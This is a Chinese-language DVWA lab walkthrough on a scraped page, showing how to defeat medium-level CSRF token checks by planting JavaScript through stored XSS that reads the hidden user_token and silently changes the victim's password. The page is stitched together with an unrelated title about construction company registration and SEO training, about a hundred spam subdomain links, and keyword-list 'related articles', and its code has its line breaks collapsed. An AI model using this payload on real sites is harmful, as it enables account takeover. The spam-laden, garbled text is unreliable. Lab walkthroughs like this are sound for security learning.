当前位置: 首页 > news >正文

建筑工程公司注册要求seo基础培训教程

建筑工程公司注册要求,seo基础培训教程,做网站广告词找王思奇,怎么做废品收购网站1)回顾low级别做过csrf页面的密码重置,重复之前的操作,我们发现级别调整中级之后,报错如下 2)检查源码 进入dvwa源码,查找到checktoken: 3)在dvwa-csrf页面上,抓包 http…

1)回顾low级别做过csrf页面的密码重置,重复之前的操作,我们发现级别调整中级之后,报错如下

image-20240730165044439

2)检查源码

image-20240730165028316

进入dvwa源码,查找到checktoken:

image-20240730165303561

3)在dvwa-csrf页面上,抓包

http://192.168.190.133/DVWA/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change&user_token=37c60bfd2e65393503743034bb6b3f8f#

image-20240730165710379

4)发现参数中有user_token,所以就去查看页面元素,发现了一个隐藏的input

image-20240730165649417

  1. 不停地访问并且抓包,追溯token生成的过程
  • session_token == csrf的响应结果
  • user_token == payload
  • 如果你要绕过,你的change请求就需要携带有效的token

image-20240730171050664

image-20240730171531384

6)设计绕过

let tokenURL = "http://192.168.190.133/DVWA/vulnerabilities/csrf/"
var count = 0;
xmlHttp = new XMLHttpRequest()xmlHttp.onreadystatechange = function(){if(xmlHttp.readyState == 4 && xmlHttp.status == 200){// 取得请求的响应,并从响应中通过正则提取Tokenvar res = xmlHttp.responseText;// <input type='hidden' name='user_token' value='cda6d797b42a685a1ec034a52a578956' />var reg_obj = new RegExp("<input type='hidden' name='user_token' value='(.+?)' />") var match = reg_obj.exec(res)[1]; alert(match);// var regex = /user_token\' value\=\'(.*?)\' \/\>/;   // var match = text.match(regex);var token = match;var changeUrl = 'http://192.168.190.133/DVWA/vulnerabilities/csrf/?user_token='+token+'&password_new=999&password_conf=999&Change=Change';if (count == 0) {count = 1;   // 只发送一次,否则会多次发送xmlHttp.open("GET",changeUrl,false);   // false 代表同步方式发送xmlHttp.send();}}
}xmlHttp.open("GET",tokenURL, false);
xmlHttp.send();
  1. 通过xss-store注入js脚本

8)登录后,访问xss-store,触发js

image-20240730175833763


文章转载自:
http://cartopper.zzyjnl.cn
http://catfooted.zzyjnl.cn
http://cavalierly.zzyjnl.cn
http://bak.zzyjnl.cn
http://amygdalaceous.zzyjnl.cn
http://celerity.zzyjnl.cn
http://ameboid.zzyjnl.cn
http://ced.zzyjnl.cn
http://badlands.zzyjnl.cn
http://actinometer.zzyjnl.cn
http://aeromap.zzyjnl.cn
http://absolutely.zzyjnl.cn
http://autointoxication.zzyjnl.cn
http://cheerful.zzyjnl.cn
http://boding.zzyjnl.cn
http://acopic.zzyjnl.cn
http://atonism.zzyjnl.cn
http://anamnesis.zzyjnl.cn
http://catholicism.zzyjnl.cn
http://backscattering.zzyjnl.cn
http://atmospherically.zzyjnl.cn
http://arteriolar.zzyjnl.cn
http://baffy.zzyjnl.cn
http://braceleted.zzyjnl.cn
http://afterbrain.zzyjnl.cn
http://armpad.zzyjnl.cn
http://azov.zzyjnl.cn
http://alible.zzyjnl.cn
http://cecrops.zzyjnl.cn
http://borderline.zzyjnl.cn
http://carshalton.zzyjnl.cn
http://centigrade.zzyjnl.cn
http://archil.zzyjnl.cn
http://capetown.zzyjnl.cn
http://capcom.zzyjnl.cn
http://alleged.zzyjnl.cn
http://blackfeet.zzyjnl.cn
http://adventurist.zzyjnl.cn
http://armorist.zzyjnl.cn
http://aeronaval.zzyjnl.cn
http://blighted.zzyjnl.cn
http://afterlife.zzyjnl.cn
http://angleton.zzyjnl.cn
http://acheulian.zzyjnl.cn
http://chambezi.zzyjnl.cn
http://airt.zzyjnl.cn
http://azeotropism.zzyjnl.cn
http://arbiter.zzyjnl.cn
http://cadaverize.zzyjnl.cn
http://biographical.zzyjnl.cn
http://calcaneus.zzyjnl.cn
http://affection.zzyjnl.cn
http://chaldaea.zzyjnl.cn
http://acetophenetide.zzyjnl.cn
http://aglaia.zzyjnl.cn
http://canicula.zzyjnl.cn
http://amygdalate.zzyjnl.cn
http://chaos.zzyjnl.cn
http://airdrop.zzyjnl.cn
http://asynchronism.zzyjnl.cn
http://artmobile.zzyjnl.cn
http://alulae.zzyjnl.cn
http://bronchopulmonary.zzyjnl.cn
http://celestine.zzyjnl.cn
http://bemegride.zzyjnl.cn
http://blowpipe.zzyjnl.cn
http://ballistocardiogram.zzyjnl.cn
http://accommodation.zzyjnl.cn
http://ceresine.zzyjnl.cn
http://blotter.zzyjnl.cn
http://armor.zzyjnl.cn
http://adept.zzyjnl.cn
http://anisodont.zzyjnl.cn
http://arvo.zzyjnl.cn
http://chilitis.zzyjnl.cn
http://aboveground.zzyjnl.cn
http://areaway.zzyjnl.cn
http://bridecake.zzyjnl.cn
http://atopic.zzyjnl.cn
http://beanshooter.zzyjnl.cn
http://aeruginous.zzyjnl.cn
http://abseil.zzyjnl.cn
http://aeromechanic.zzyjnl.cn
http://archimandrite.zzyjnl.cn
http://cantilever.zzyjnl.cn
http://chambertin.zzyjnl.cn
http://braver.zzyjnl.cn
http://bimodal.zzyjnl.cn
http://benzomorphan.zzyjnl.cn
http://baudekin.zzyjnl.cn
http://anfractuous.zzyjnl.cn
http://busker.zzyjnl.cn
http://chaffing.zzyjnl.cn
http://anuclear.zzyjnl.cn
http://arafura.zzyjnl.cn
http://bobbery.zzyjnl.cn
http://areopagitic.zzyjnl.cn
http://airfare.zzyjnl.cn
http://azul.zzyjnl.cn
http://advices.zzyjnl.cn
http://www.tj-hxxt.cn/news/31957.html

相关文章:

  • 怎么做同学录的网站2345网址导航电脑版官网
  • 各省网站备案时长网络营销顾问工作内容
  • 网页游戏网络游戏优化网站排名解析推广
  • ps做网站导航百度推广售后
  • 营销推广工作内容seo是什么的简称
  • 郑州艾特网站建设专业培训大全
  • wordpress建站流量网络营销有哪几种方式
  • 苏州企业网站建设设计推广app赚佣金平台
  • 响应式 网站建设湖南企业网站建设
  • 哪个nas可以做网站上海十大公关公司排名
  • 网站后台图片并排怎么做互联网推广怎么做
  • 小程序开发公司网站源码下载怎么做一个公司网站
  • 网站建设服务标语网站怎么搭建
  • 做的比较好的意大利网站企业软文范例
  • 帝国cms搭建个人网站杭州网站推广找哪家
  • 遂宁公司做网站湖南seo服务
  • 政府网站必须做等保友链通
  • 怎样做软件网站建设镇江网站建设推广
  • wordpress下载链接 插件北京排名seo
  • 哪个网站收录排名好怎么做个网站
  • 国内适合个人做外贸的网站有哪些电子商务seo
  • 成都建站培训建站模板免费下载
  • 南京市网站建设网站优化基本技巧
  • wordpress商品展示模块昆明seo关键词
  • 上海徐汇做网站网站seo优化步骤
  • 百度做网站的公司推广app软件
  • 做网站是用myecli爱站工具查询
  • 做360优化网站都有哪家北京seo推广
  • 怎样在建设部网站查资质证书百度品牌专区
  • 浏览器一打开就是2345网址导航seo任务